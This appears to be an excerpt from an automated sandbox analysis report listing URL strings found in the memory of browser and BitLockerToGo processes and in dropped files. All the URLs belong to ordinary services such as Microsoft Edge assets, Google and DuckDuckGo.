                  Source: msedge.exe, 0000000B.00000002.2162892956.0000027C22179000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
                  Source: 2cc80dabc69f58b6_1.12.drString found in binary or memory: https://assets.msn.cn/resolver/
                  Source: 2cc80dabc69f58b6_1.12.drString found in binary or memory: https://assets.msn.com/resolver/
                  Source: 2cc80dabc69f58b6_1.12.drString found in binary or memory: https://bit.ly/wb-precache
                  Source: BitLockerToGo.exe, 00000003.00000002.2656831293.0000000005958000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000CDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
                  Source: BitLockerToGo.exe, 00000003.00000002.2656831293.0000000005958000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000CDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
                  Source: 2cc80dabc69f58b6_1.12.drString found in binary or memory: https://browser.events.data.msn.cn/
                  Source: 2cc80dabc69f58b6_1.12.drString found in binary or memory: https://browser.events.data.msn.com/
                  Source: Reporting and NEL.14.drString found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
                  Source: 2cc80dabc69f58b6_1.12.drString found in binary or memory: https://c.msn.com/
                  Source: BitLockerToGo.exe, 00000003.00000002.2653431701.0000000005528000.00000004.00000020.00020000.00000000.sdmp, zmglfu.3.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: chrome.exe, 00000007.00000003.2039230488.00005AF000C50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.ico
                  Source: chrome.exe, 00000007.00000003.2039230488.00005AF000C50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
                  Source: BitLockerToGo.exe, 00000003.00000002.2653431701.0000000005528000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2653431701.000000000564E000.00000004.00000020.00020000.00000000.sdmp, zmglfu.3.dr, 3ozmoz.3.dr, Web Data.12.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: BitLockerToGo.exe, 00000003.00000002.2653431701.0000000005528000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2653431701.000000000564E000.00000004.00000020.00020000.00000000.sdmp, zmglfu.3.dr, 3ozmoz.3.dr, Web Data.12.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: chrome.exe, 00000007.00000003.1974665467.00005AF000D38000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000002.2167913254.00001FB40016C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                  Source: chrome.exe, 00000007.00000003.1976387363.00005AF000D28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1973613520.00005AF000F18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1979650519.00005AF000D38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1971155720.00005AF000D10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1971244543.00005AF000D28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1974665467.00005AF000D38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
                  Source: chrome.exe, 00000007.00000003.1967101214.00005AF0002A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1999978519.0000244000974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1963750620.000024400071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1963873511.0000244000728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
                  Source: chrome.exe, 00000007.00000003.1967101214.00005AF0002A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1999978519.0000244000974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1963750620.000024400071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1963873511.0000244000728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
                  Source: chrome.exe, 00000007.00000003.2003742974.00005AF00196C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2003606107.00005AF00195C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
                  Source: chrome.exe, 00000007.00000003.1967101214.00005AF0002A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/(
                  Source: chrome.exe, 00000007.00000003.1967101214.00005AF0002A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/(TrustTokenOperationsRequiringOriginTrial#all-operat
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1999978519.0000244000974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1963750620.000024400071C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1963873511.0000244000728000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
                  Source: msedge.exe, 0000000B.00000002.2167913254.00001FB40016C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.12.drString found in binary or memory: https://chromewebstore.google.com/
                  Source: chrome.exe, 00000007.00000003.1960159923.000034DC002E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1960127499.000034DC002D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
                  Source: chrome.exe, 00000007.00000003.2039230488.00005AF000C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.1967600922.00005AF0004DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000B.00000002.2166755614.00001FB400040000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.12.drString found in binary or memory: https://clients2.google.com/service/update2/crx
                  Source: chromecache_477.9.drString found in binary or memory: https://clients6.google.com
                  Source: chromecache_477.9.drString found in binary or memory: https://content.googleapis.com
                  Source: BitLockerToGo.exe, 00000003.00000002.2656831293.0000000005958000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000CDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                  Source: BitLockerToGo.exe, 00000003.00000002.2656831293.0000000005958000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2650827814.0000000000CDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                  Source: Reporting and NEL.14.drString found in binary or memory: https://deff.nelreports.net/api/report
                  Source: Reporting and NEL.14.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                  Source: Reporting and NEL.14.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msnw
                  Source: chrome.exe, 00000007.00000003.1967600922.00005AF0004DC000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.12.drString found in binary or memory: https://docs.google.com/
                  Source: chrome.exe, 00000007.00000003.2013025564.00005AF001C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2013070357.00005AF001C60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/
                  Source: chrome.exe, 00000007.00000003.1998747362.00005AF001818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview2K
                  Source: chrome.exe, 00000007.00000003.2013025564.00005AF001C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2013070357.00005AF001C60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/dogl
                  Source: chrome.exe, 00000007.00000003.2013025564.00005AF001C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2013070357.00005AF001C60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/njb
                  Source: chromecache_477.9.drString found in binary or memory: https://domains.google.com/suggest/flow
                  Source: chrome.exe, 00000007.00000003.1967600922.00005AF0004DC000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.12.drString found in binary or memory: https://drive-autopush.corp.google.com/
                  Source: chrome.exe, 00000007.00000003.1967600922.00005AF0004DC000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.12.drString found in binary or memory: https://drive-daily-0.corp.google.com/
                  Source: chrome.exe, 00000007.00000003.1967600922.00005AF0004DC000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.12.drString found in binary or memory: https://drive-daily-1.corp.google.com/
                  Source: chrome.exe, 00000007.00000003.1967600922.00005AF0004DC000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.12.drString found in binary or memory: https://drive-daily-2.corp.google.com/
                  Source: chrome.exe, 00000007.00000003.1967600922.00005AF0004DC000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.12.drString found in binary or memory: https://drive-daily-3.corp.google.com/
                  Source: chrome.exe, 00000007.00000003.1967600922.00005AF0004DC000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.12.drString found in binary or memory: https://drive-daily-4.corp.google.com/
                  Source: chrome.exe, 00000007.00000003.1967600922.00005AF0004DC000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.12.drString found in binary or memory: https://drive-daily-5.corp.google.com/
                  Source: chrome.exe, 00000007.00000003.1967600922.00005AF0004DC000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.12.drString found in binary or memory: https://drive-daily-6.corp.google.com/
                  Source: chrome.exe, 00000007.00000003.1967600922.00005AF0004DC000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.12.drString found in binary or memory: https://drive-preprod.corp.google.com/
                  Source: chrome.exe, 00000007.00000003.1967600922.00005AF0004DC000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.12.drString found in binary or memory: https://drive-staging.corp.google.com/
                  Source: chrome.exe, 00000007.00000003.1976735759.00005AF001278000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
                  Source: chrome.exe, 00000007.00000003.1967600922.00005AF0004DC000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.12.drString found in binary or memory: https://drive.google.com/
                  Source: chrome.exe, 00000007.00000003.2039230488.00005AF000C50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
                  Source: BitLockerToGo.exe, 00000003.00000002.2653431701.0000000005528000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2653431701.000000000564E000.00000004.00000020.00020000.00000000.sdmp, zmglfu.3.dr, 3ozmoz.3.dr, Web Data.12.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: BitLockerToGo.exe, 00000003.00000002.2653431701.0000000005528000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2653431701.000000000564E000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000007.00000003.2039230488.00005AF000C50000.00000004.00000800.00020000.00000000.sdmp, zmglfu.3.dr, 3ozmoz.3.dr, Web Data.12.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: chrome.exe, 00000007.00000003.2039230488.00005AF000C50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.ico
                  Source: BitLockerToGo.exe, 00000003.00000002.2653431701.0000000005528000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2653431701.000000000564E000.00000004.00000020.00020000.00000000.sdmp, zmglfu.3.dr, 3ozmoz.3.dr, Web Data.12.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: chrome.exe, 00000007.00000003.2039230488.00005AF000C50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icondTripTime
                  Source: 000003.log6.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
                  Source: 000003.log6.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
                  Source: 000003.log7.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtrac
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_163_music.png/1.0.3/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr, HubApps Icons.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr, HubApps Icons.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_amazon_music_light.png/1.4.13/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_deezer.png/1.4.12/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_color.png/1.0.14/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_hc.png/1.0.14/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_hc.png/1.1.12/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_dark.png/1.1.12/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr, HubApps Icons.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_hc.png/1.2.0/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_dark.png/1.2.0/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_light.png/1.2.0/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_facebook_messenger.png/1.5.14/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gaana.png/1.0.3/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr, HubApps Icons.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gmail.png/1.5.4/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_iHeart.png/1.0.3/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_light.png/1.0.14/a
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_instagram.png/1.4.13/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_ku_gou.png/1.0.3/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_last.png/1.0.3/asset
                  Source: 000003.log6.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_naver_vibe.png/1.0.3/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_dark.png/1.4.9/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_hc.png/1.4.9/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_light.png/1.4.9/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr, HubApps Icons.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_qq.png/1.0.3/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_dark.png/1.1.12/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_hc.png/1.1.12/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_light.png/1.1.12/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr, HubApps Icons.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.1.12/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.1.12/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.dr, HubApps Icons.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_sound_cloud.png/1.0.3/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_spotify.png/1.4.12/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_dark.png/1.2.19/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_hc.png/1.2.19/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_light.png/1.2.19/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_telegram.png/1.0.4/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tidal.png/1.0.3/asset
                  Source: dc3200b3-06f9-4cab-9213-27944202d12e.tmp.12.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
